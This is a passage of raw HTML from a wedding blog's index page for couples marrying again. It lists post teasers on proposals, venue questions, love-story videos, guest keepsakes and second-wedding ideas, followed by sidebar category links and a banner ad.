content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/wedding-photos-printed.jpg?fit=844%2C844&#038;ssl=1'/> <meta itemprop='width' content='844'/> <meta itemprop='height' content='844'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="relationships"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9827 post type-post status-publish format-standard has-post-thumbnail hentry category-relationships tag-engagement tag-rings tag-will-you-marry-me" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/how-to-pop-the-question-and-be-certain-she-says-yes/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-134" href="https://www.idotaketwo.com/blog/category/relationships/" title="View all posts in Relationships" rel="category">Relationships</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/how-to-pop-the-question-and-be-certain-she-says-yes/" itemprop="url" rel="bookmark"> How to Pop the Question and Be Certain She Says Yes </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/how-to-pop-the-question-and-be-certain-she-says-yes/" class="vw-post-date updated" title="Permalink to How to Pop the Question and Be Certain She Says Yes" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-16T19:31:23-04:00">November 16, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>With everyone so happy about sharing their innermost feelings on social media it might feel like romance is dead. When it comes to a marriage proposal using digital means is most definitely not the right way to approach it, but what is a man to do if he wants to steal a woman’s breath away? &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/how-to-pop-the-question-and-be-certain-she-says-yes/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/how-to-pop-the-question-and-be-certain-she-says-yes/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-16T19:31:23-04:00"/><meta itemprop="dateModified" content="2018-11-16T19:31:44-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/engagement.jpeg?fit=1280%2C853&#038;ssl=1'/> <meta itemprop='width' content='1280'/> <meta itemprop='height' content='853'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-advice wedding-planning-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9823 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-advice category-wedding-planning-2 tag-questions-to-ask tag-venue tag-wedding-reception tag-wedding-venue" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?resize=150%2C83&amp;ssl=1 150w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?resize=335%2C186&amp;ssl=1 335w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?resize=225%2C125&amp;ssl=1 225w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/important-questions-to-ask-your-wedding-venue/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1310" href="https://www.idotaketwo.com/blog/category/wedding-advice/" title="View all posts in Wedding Advice" rel="category">Wedding Advice</a><a class=" vw-cat-id-1310 vw-cat-id-163" href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="View all posts in Wedding Planning" rel="category">Wedding Planning</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/important-questions-to-ask-your-wedding-venue/" itemprop="url" rel="bookmark"> Important Questions to Ask Your Wedding Venue </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/important-questions-to-ask-your-wedding-venue/" class="vw-post-date updated" title="Permalink to Important Questions to Ask Your Wedding Venue" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-16T18:28:01-04:00">November 16, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>You want to make the most of your wedding venue. This is where you’ll say “I do,” and it’s a spot you’ll remember for the rest of your life. You don’t want to miss out on anything important. When you’re considering venue locations, how do you even know where to begin? This guide will share &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/important-questions-to-ask-your-wedding-venue/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/important-questions-to-ask-your-wedding-venue/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-16T18:28:01-04:00"/><meta itemprop="dateModified" content="2018-11-16T18:28:01-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/ask-venue-two.jpg?fit=940%2C627&#038;ssl=1'/> <meta itemprop='width' content='940'/> <meta itemprop='height' content='627'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-video"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9758 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-video tag-couple tag-love-story tag-software tag-video" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?resize=150%2C83&amp;ssl=1 150w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?resize=335%2C186&amp;ssl=1 335w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?resize=225%2C125&amp;ssl=1 225w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/how-to-make-your-own-wedding-love-story-video/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1312" href="https://www.idotaketwo.com/blog/category/wedding-video/" title="View all posts in Wedding Video" rel="category">Wedding Video</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/how-to-make-your-own-wedding-love-story-video/" itemprop="url" rel="bookmark"> How to Make your Own Wedding Love Story Video </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/how-to-make-your-own-wedding-love-story-video/" class="vw-post-date updated" title="Permalink to How to Make your Own Wedding Love Story Video" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-16T18:14:18-04:00">November 16, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>Last summer she was walking through the garden and taking photos for her portfolio, and he serendipitously fell into the path of her camera lens. He was on a skateboard in a park. Upon seeing the beautiful young girl, he drove up on his board. And that’s how my friends Mike and Sara met. They &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/how-to-make-your-own-wedding-love-story-video/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/how-to-make-your-own-wedding-love-story-video/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-16T18:14:18-04:00"/><meta itemprop="dateModified" content="2018-11-16T18:14:18-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/weddingcouple.jpg?fit=2048%2C1365&#038;ssl=1'/> <meta itemprop='width' content='2048'/> <meta itemprop='height' content='1365'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-advice wedding-gifts"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9809 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-advice category-wedding-gifts" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="wedding favor potpourri" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/unconventional-wedding-keepsakes-your-guests-will-love/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-95 vw-cat-id-1310" href="https://www.idotaketwo.com/blog/category/wedding-advice/" title="View all posts in Wedding Advice" rel="category">Wedding Advice</a><a class=" vw-cat-id-95 vw-cat-id-1310 vw-cat-id-1308" href="https://www.idotaketwo.com/blog/category/wedding-gifts/" title="View all posts in Wedding Gifts" rel="category">Wedding Gifts</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/unconventional-wedding-keepsakes-your-guests-will-love/" itemprop="url" rel="bookmark"> Unconventional Wedding Keepsakes Your Guests Will Love </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/unconventional-wedding-keepsakes-your-guests-will-love/" class="vw-post-date updated" title="Permalink to Unconventional Wedding Keepsakes Your Guests Will Love" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-14T10:41:39-04:00">November 14, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>Spice up the end of the night and leave your guests with something slightly more unique than a bag of Jordan almonds. Whether you want to thank them for coming and celebrating with a delicious edible that’s reminiscent of the season or a piece of love that can last a while after everyone slips off &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/unconventional-wedding-keepsakes-your-guests-will-love/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/unconventional-wedding-keepsakes-your-guests-will-love/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-14T10:41:39-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:24:17-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/unconventional-wedding-keepsakes-09.jpg?fit=700%2C479&#038;ssl=1'/> <meta itemprop='width' content='700'/> <meta itemprop='height' content='479'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-advice"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9797 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-advice tag-ideas tag-personalized tag-unique" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?resize=150%2C83&amp;ssl=1 150w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?resize=335%2C186&amp;ssl=1 335w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?resize=225%2C125&amp;ssl=1 225w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/10-personalized-elements-to-make-your-second-wedding-a-stand-out/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1310" href="https://www.idotaketwo.com/blog/category/wedding-advice/" title="View all posts in Wedding Advice" rel="category">Wedding Advice</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/10-personalized-elements-to-make-your-second-wedding-a-stand-out/" itemprop="url" rel="bookmark"> 10 Personalized Elements to Make Your Second Wedding a Stand Out </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/10-personalized-elements-to-make-your-second-wedding-a-stand-out/" class="vw-post-date updated" title="Permalink to 10 Personalized Elements to Make Your Second Wedding a Stand Out" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-07T13:23:12-04:00">November 7, 2018</time></a> </div> <div class="vw-post-box__excerpt"><p>Ready to retake the plunge? Before sending out the printed personal envelopes containing your wedding invitations, you need to start planning your wedding. Do not just go with the usual traditional wedding norms. Try to personalize your wedding and steer away from what you had done in the past. Here are some elements of the &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/10-personalized-elements-to-make-your-second-wedding-a-stand-out/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/10-personalized-elements-to-make-your-second-wedding-a-stand-out/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-07T13:23:12-04:00"/><meta itemprop="dateModified" content="2018-11-07T13:23:12-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/Second-wedding-tips.jpg?fit=750%2C501&#038;ssl=1'/> <meta itemprop='width' content='750'/> <meta itemprop='height' content='501'/> </div> </div> </div> </div> </div> </div> <div class="col-lg-4 vwspc-section-sidebar"> <div class="vw-sticky-sidebar theiaStickySidebar"><div id="text-51" class="widget widget_text"> <div class="textwidget"></div> </div><div id="text-63" class="widget widget_text"> <div class="textwidget"></div> </div><div id="text-59" class="widget widget_text"> <div class="textwidget"></div> </div><div id="text-44" class="widget widget_text"> <div class="textwidget"><a href="http://www.basicinvite.com/wedding/wedding-invitations.html?utm_source=topwedding&amp;utm_medium=banner&amp;utm_term=wedding&amp;utm_content=ad1&amp;utm_campaign=topwedding" target="_blank" rel="noopener noreferrer"><img class="aligncenter size-full wp-image-12629" alt="basic_invite_ad" src="https://i2.wp.com/www.topweddingsites.com/wedding-blog/wp-content/uploads/2014/04/topweddingsites-1.gif?resize=300%2C250" width="300" height="250" data-recalc-dims="1" /></a> </div> </div><div id="text-57" class="widget widget_text"> <div class="textwidget"></div> </div><div id="vw_widget_categories-2" class="widget widget_vw_widget_categories"><ul class="vw-category-list"> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">33</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/children-stepfamilies/" title="Permalink to " rel="bookmark"> Children &amp; Stepfamilies </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/four-ways-creatively-involve-children-mixed-family-wedding/" title="Permalink to Four Ways to Creatively Involve Children in a Mixed Family Wedding" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/08/9dff50fd111708519e778c6385e51747.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/no-kids-allowed-wedding-etiquette-tips/" title="Permalink to &#8220;No Kids Allowed&#8221; Wedding Etiquette Tips" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/rikqg36qlcg-mikael-kristenson.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/want-second-wedding-child-free-affair/" title="Permalink to When You Want Your Second Wedding To Be A Child-Free Affair" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/27362272504_13377eba35_b.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">149</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/etiquette-planning/" title="Permalink to " rel="bookmark"> Etiquette &amp; Planning </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" title="Permalink to Save Money on Your Second Wedding: 10 Great Ideas" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-before-sending-out-thank-you-cards/" title="Permalink to Everything You Need to Know Before Sending Out Thank You Cards" rel="bookmark" style="background-image: url( https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">28</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/honeymoon-travel/" title="Permalink to " rel="bookmark"> Honeymoon &amp; Travel </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/unusual-second-honeymoon-destinations/" title="Permalink to Unusual Second Honeymoon Destinations" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/04/Stralsund-Germany.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/5-top-winter-wedding-destinations-europe/" title="Permalink to 5 Top Winter Wedding Destinations In Europe" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/12/Snow-Chapel-at-Ice-Village.png?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/5-tips-hosting-successful-destination-wedding/" title="Permalink to 5 Tips for Hosting a Successful Destination Wedding" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/12/weddings-2784455_1280.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">82</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/inspiration/" title="Permalink to " rel="bookmark"> Inspiration </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" title="Permalink to 21 Princess Ball Gown Wedding Dresses for the Modern Bride" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark" style="background-image: url( 